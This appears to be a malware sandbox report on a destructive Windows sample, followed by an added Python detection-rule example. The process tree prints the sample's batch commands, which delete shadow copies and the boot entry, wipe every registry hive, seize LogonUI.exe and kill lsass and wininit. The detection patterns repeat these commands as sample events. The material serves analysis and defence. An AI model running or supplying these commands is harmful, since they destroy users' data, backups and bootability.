Analysis

  • max time kernel
    15s
  • max time network
    14s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    18-04-2021 01:08

Errors

Reason
Machine shutdown

General

  • Target

    1383b80440ad105c0899143a80472ca844cc9c23de6d4e59777eb7f464747813.exe

  • Size

    86KB

  • MD5

    226213909fea9a07e66f734dedfb2d1d

  • SHA1

    218d7e3178a60ad08abebc68bb462773a6f80b38

  • SHA256

    1383b80440ad105c0899143a80472ca844cc9c23de6d4e59777eb7f464747813

  • SHA512

    ecb0c2a7fc5ee54168dedd4f67a626ce3fea7ec977b65bb59fed36b48f1d2c20407228ad96e14969c58976e6a98ffd33399ea6f0b15ed6ba5568ce26abbfdce3

Malware Config

Signatures

  • Adds autorun key to be loaded by Explorer.exe on startup 2 TTPs
  • Modifies system executable filetype association 2 TTPs 45 IoCs
  • Registers COM server for autorun 1 TTPs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies Installed Components in the registry 2 TTPs
  • Possible privilege escalation attempt 2 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Installs/modifies Browser Helper Object 2 TTPs

    BHOs are DLL modules which act as plugins for Internet Explorer.

  • Modifies boot configuration data using bcdedit 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 10 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 64 IoCs
  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 64 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 34 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\1383b80440ad105c0899143a80472ca844cc9c23de6d4e59777eb7f464747813.exe
    "C:\Users\Admin\AppData\Local\Temp\1383b80440ad105c0899143a80472ca844cc9c23de6d4e59777eb7f464747813.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:788
    • C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\BB4.tmp\BB5.tmp\BB6.bat C:\Users\Admin\AppData\Local\Temp\1383b80440ad105c0899143a80472ca844cc9c23de6d4e59777eb7f464747813.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1288
      • C:\Windows\System32\bcdedit.exe
        bcdedit /delete {current}
        3⤵
        • Modifies boot configuration data using bcdedit
        PID:1960
      • C:\Windows\System32\vssadmin.exe
        vssadmin delete shadows /for=c: /all /quiet
        3⤵
        • Interacts with shadow copies
        PID:1936
      • C:\Windows\System32\takeown.exe
        takeown /f LogonUI.exe
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:1428
      • C:\Windows\System32\icacls.exe
        icacls LogonUI.exe /grant Admin:f
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:1628
      • C:\Windows\System32\reg.exe
        reg delete HKCU /f
        3⤵
        • Adds Run key to start application
        • Modifies Internet Explorer settings
        • Modifies registry class
        • Modifies registry key
        PID:1708
      • C:\Windows\System32\reg.exe
        reg delete HKU /f
        3⤵
        • Adds Run key to start application
        • Modifies data under HKEY_USERS
        PID:1016
      • C:\Windows\System32\reg.exe
        reg delete HKCC /f
        3⤵
        PID:928
      • C:\Windows\System32\reg.exe
        reg delete HKCR /f
        3⤵
        • Modifies system executable filetype association
        • Modifies registry class
        PID:428
      • C:\Windows\System32\taskkill.exe
        taskkill /im lsass.exe /f /t
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1668
      • C:\Windows\System32\reg.exe
        reg delete HKLM /f
        3⤵
        • Adds Run key to start application
        • Checks processor information in registry
        • Enumerates system info in registry
        • Modifies Internet Explorer settings
        • Modifies registry key
        PID:1704
      • C:\Windows\System32\taskkill.exe
        taskkill /im wininit.exe /f /t
        3⤵
        • Kills process with taskkill
        PID:1328
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:1732
  • C:\Windows\system32\wlrmdr.exe
    -s -1 -f 2 -t You are about to be logged off -m Windows has encountered a critical problem and will restart automatically in one minute. Please save your work now. -a 3
    1⤵
    PID:1604
  • C:\Windows\system32\CompMgmtLauncher.exe
    "C:\Windows\system32\CompMgmtLauncher.exe"
    1⤵
    PID:236
  • C:\Windows\system32\CompMgmtLauncher.exe
    "C:\Windows\system32\CompMgmtLauncher.exe"
    1⤵
    PID:1720
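
The process tree above is a dropped batch file driving built-in Windows utilities: vssadmin deletes the shadow copies, bcdedit deletes the current boot entry, reg delete /f is aimed at the root of every hive, takeown and icacls change the ownership and ACL of LogonUI.exe, and taskkill targets lsass.exe and wininit.exe. As an added example that is not part of the sandbox report, the Python below runs simple detection rules for exactly those command lines over process-creation events. The Event schema (pid, image, cmdline) and the sample events are constructed for the example, modelled on the tree above; in practice the events would come from Sysmon Event ID 1 or Security Event ID 4688. The ATT&CK IDs in the rule tags are the v6 IDs the report's matrix uses; the taskkill rule has no mapping in that matrix and is tagged by name only.

```python
"""Detection rules for the destructive command lines in the process tree above.

Added example, not part of the sandbox report. The Event schema and the
SAMPLE_EVENTS list are constructed for illustration.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Event:
    """One process-creation event (constructed schema, not a real log format)."""
    pid: int
    image: str
    cmdline: str


# Each rule is (tag, compiled pattern over the command line). ATT&CK IDs are
# the v6 IDs used in the report's matrix; the taskkill rule is unmapped there.
RULES = [
    ("T1490 shadow copy deletion (vssadmin)",
     re.compile(r"\bvssadmin(?:\.exe)?\s+delete\s+shadows\b", re.I)),
    ("T1490 boot entry deletion (bcdedit)",
     re.compile(r"\bbcdedit(?:\.exe)?\b.*\s/delete\s+\{current\}", re.I)),
    ("T1222 ownership/ACL change on LogonUI.exe",
     re.compile(r"\b(?:takeown|icacls)(?:\.exe)?\b.*\bLogonUI\.exe\b", re.I)),
    # Only a bare hive root (no subkey) followed by /f: a whole-hive wipe.
    ("T1112 registry hive root deletion (reg delete /f)",
     re.compile(r"\breg(?:\.exe)?\s+delete\s+(?:HKLM|HKCU|HKU|HKCR|HKCC)\s+/f\b", re.I)),
    ("taskkill against lsass.exe or wininit.exe",
     re.compile(r"\btaskkill(?:\.exe)?\b.*/im\s+(?:lsass|wininit)\.exe\b", re.I)),
    # cmd.exe running a .bat from %TEMP%\<x>.tmp\<y>.tmp\, as in the tree above.
    ("batch launched from nested .tmp directories under Temp",
     re.compile(r'cmd\.exe.*\\Temp\\[^\\\s"]+\.tmp\\[^\\\s"]+\.tmp\\[^\\\s"]+\.bat',
                re.I)),
]

# Constructed sample events mirroring the report's process tree, plus two
# benign look-alikes (reg query, vssadmin list) that must not fire.
SAMPLE_EVENTS = [
    Event(1288, r"C:\Windows\system32\cmd.exe",
          r'"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\BB4.tmp\BB5.tmp\BB6.bat '
          r'C:\Users\Admin\AppData\Local\Temp\1383b80440ad105c0899143a80472ca844cc9c23de6d4e59777eb7f464747813.exe"'),
    Event(1960, r"C:\Windows\System32\bcdedit.exe", "bcdedit /delete {current}"),
    Event(1936, r"C:\Windows\System32\vssadmin.exe", "vssadmin delete shadows /for=c: /all /quiet"),
    Event(1428, r"C:\Windows\System32\takeown.exe", "takeown /f LogonUI.exe"),
    Event(1628, r"C:\Windows\System32\icacls.exe", "icacls LogonUI.exe /grant Admin:f"),
    Event(1708, r"C:\Windows\System32\reg.exe", "reg delete HKCU /f"),
    Event(1668, r"C:\Windows\System32\taskkill.exe", "taskkill /im lsass.exe /f /t"),
    Event(9001, r"C:\Windows\System32\reg.exe", r"reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion"),
    Event(9002, r"C:\Windows\System32\vssadmin.exe", "vssadmin list shadows"),
]


def classify(event: Event) -> list[str]:
    """Return the tags of every rule whose pattern matches the command line."""
    return [tag for tag, pattern in RULES if pattern.search(event.cmdline)]


def scan(events: list[Event]) -> dict[int, list[str]]:
    """Map PID -> matching tags, keeping only events that hit at least one rule."""
    hits: dict[int, list[str]] = {}
    for event in events:
        tags = classify(event)
        if tags:
            hits[event.pid] = tags
    return hits


if __name__ == "__main__":
    for pid, tags in scan(SAMPLE_EVENTS).items():
        print(pid, tags)
```

The hive-root rule deliberately requires the key argument to be a bare root such as HKCU or HKLM; a reg delete of a specific subkey is routine administration and is left alone. Any single hit from the first five rules on a workstation is worth an alert on its own; the batch-from-nested-.tmp rule is a weaker signal and is best used to correlate the others back to their parent.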

Network

MITRE ATT&CK Matrix ATT&CK v6

Persistence

  • Registry Run Keys / Startup Folder (T1060): 4 signatures
  • Change Default File Association (T1042): 1 signature
  • Browser Extensions (T1176): 1 signature

Defense Evasion

  • Modify Registry (T1112): 7 signatures
  • File Deletion (T1107): 2 signatures
  • File Permissions Modification (T1222): 1 signature

Discovery

  • System Information Discovery (T1082): 3 signatures
  • Query Registry (T1012): 2 signatures

Impact

  • Inhibit System Recovery (T1490): 2 signatures


Downloads

  • C:\Users\Admin\AppData\Local\Temp\BB4.tmp\BB5.tmp\BB6.bat
    MD5 38dc7703a0a8fddc5870776a3b4e662c
    SHA1 4fd989609b186842874ce1dba6b32ab71bc77881
    SHA256 5636818caa00d72d10df36a8b37cd355d74855c5cf891aeaf468c19d1f08176c
    SHA512 dd89c0adcaa1b5122eddda514d9cebe3cc100f2aed13192ba1e58ffb1848bed5c46c6b9d2762e3d1a0da01d5f099cada05a99167f675768f6573b8ef983f5291
  • memory/428-69-0x0000000000000000-mapping.dmp
  • memory/788-59-0x0000000075551000-0x0000000075553000-memory.dmp
    Filesize 8KB
  • memory/928-68-0x0000000000000000-mapping.dmp
  • memory/1016-67-0x0000000000000000-mapping.dmp
  • memory/1288-60-0x0000000000000000-mapping.dmp
  • memory/1428-64-0x0000000000000000-mapping.dmp
  • memory/1604-73-0x00000000003D0000-0x00000000003D1000-memory.dmp
    Filesize 4KB
  • memory/1604-72-0x000007FEFBF11000-0x000007FEFBF13000-memory.dmp
    Filesize 8KB
  • memory/1628-65-0x0000000000000000-mapping.dmp
  • memory/1668-70-0x0000000000000000-mapping.dmp
  • memory/1704-71-0x0000000000000000-mapping.dmp
  • memory/1708-66-0x0000000000000000-mapping.dmp
  • memory/1936-63-0x0000000000000000-mapping.dmp
  • memory/1960-62-0x0000000000000000-mapping.dmp